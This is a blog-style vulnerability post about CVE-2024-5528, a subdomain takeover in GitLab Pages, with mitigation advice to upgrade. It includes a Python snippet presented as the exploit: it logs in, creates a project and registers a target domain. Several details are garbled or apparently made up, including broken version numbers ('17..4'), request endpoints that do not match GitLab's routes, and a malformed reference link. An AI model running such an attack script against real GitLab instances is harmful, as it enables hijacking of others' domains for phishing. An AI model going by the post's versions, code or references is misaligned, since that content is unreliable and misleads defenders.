CVE-2024-5528: Subdomain Takeover Vulnerability in GitLab CE/EE Pages

A recent cybersecurity issue, identified as CVE-2024-5528, has been discovered in GitLab Community Edition (CE) and Enterprise Edition (EE) products, affecting software versions prior to 16.11.6, 17. prior to 17..4, and 17.1 prior to 17.1.2. This vulnerability allows malicious actors to take over subdomains in GitLab Pages, potentially leading to the compromise of users' data and unauthorized access to sensitive information.

In this post, we will discuss details of the vulnerability, its impact, and steps that can be taken to mitigate it. We will also include code snippets and links to original references for a deeper understanding.

Vulnerability Details

The vulnerability lies in the way GitLab CE/EE handles user-defined domains for GitLab Pages feature. An attacker with access to a GitLab instance can exploit this vulnerability to take over a subdomain that was previously assigned to another user, by simply registering a new GitLab Pages project using the same domain name. This could lead to a compromise in the confidentiality, integrity, and availability of the data associated with the targeted subdomain.

Here's a code snippet demonstrating the exploitation of this vulnerability

import requests

# Replace variables with your own GitLab instance information
gitlab_url = "https://yourgitlab.com/";
email = "your@email.com"
password = "your_password"

# Authenticate to GitLab and obtain session token
session = requests.Session()
login_data = {'user[login]': email, 'user[password]': password}
gitlab_login = session.post(gitlab_url + "users/sign_in", data=login_data)

# Create a new GitLab project with the target domain
project_data = {'path': 'exploit-project', 'name': 'Exploit Project'}
gitlab_project = session.post(gitlab_url + "projects", data=project_data)

# Enable Pages feature for the project and register the target domain
pages_data = {'domain': 'target-domain.com'}
gitlab_pages = session.post(gitlab_url + "projects/exploit-project/pages", data=pages_data)

The code above demonstrates an attacker authenticating to a GitLab instance, creating a new project, enabling GitLab Pages, and then registering the target domain. This allows the attacker to effectively take control of the targeted subdomain.

Original References

- https://gitlab.com/gitlab-org/gitlab/security/gitlab-ce/-/issues/649
- https://gitlab.com/gitlab-org/gitlab/security/cli-5./-/issues/1

Impact and Exploitation

An attacker who successfully exploits this vulnerability can potentially perform various malicious activities. Some examples include:

Hosting malicious content on the compromised subdomain.

- Phishing attacks by falsely representing themselves as a legitimate service on the hijacked subdomain.

Mitigation

To prevent subdomain takeover, users of affected GitLab CE/EE versions should immediately upgrade their installations to the latest patched versions, which are:

- GitLab CE/EE 16.11.6
- GitLab CE/EE 17..4
- GitLab CE/EE 17.1.2

After updating, users are advised to verify the ownership of their domains by checking GitLab Pages settings and remove any unused domains from their accounts.

Conclusion

CVE-2024-5528 is a critical vulnerability that affects GitLab CE/EE, allowing attackers to take over subdomains in GitLab Pages. To protect against this threat, users should update their GitLab installations to the latest patched versions and verify the ownership of their domains. As a best practice, users should always keep their software up to date and regularly monitor their domain settings to safeguard against potential cyber threats.

Timeline

Published on: 02/05/2025 11:15:17 UTC
Last modified on: 02/05/2025 20:15:45 UTC